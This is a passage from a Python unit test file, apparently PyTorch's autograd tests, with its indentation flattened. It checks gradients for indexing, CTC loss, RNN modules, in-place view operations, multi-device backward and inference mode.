a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.testing.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
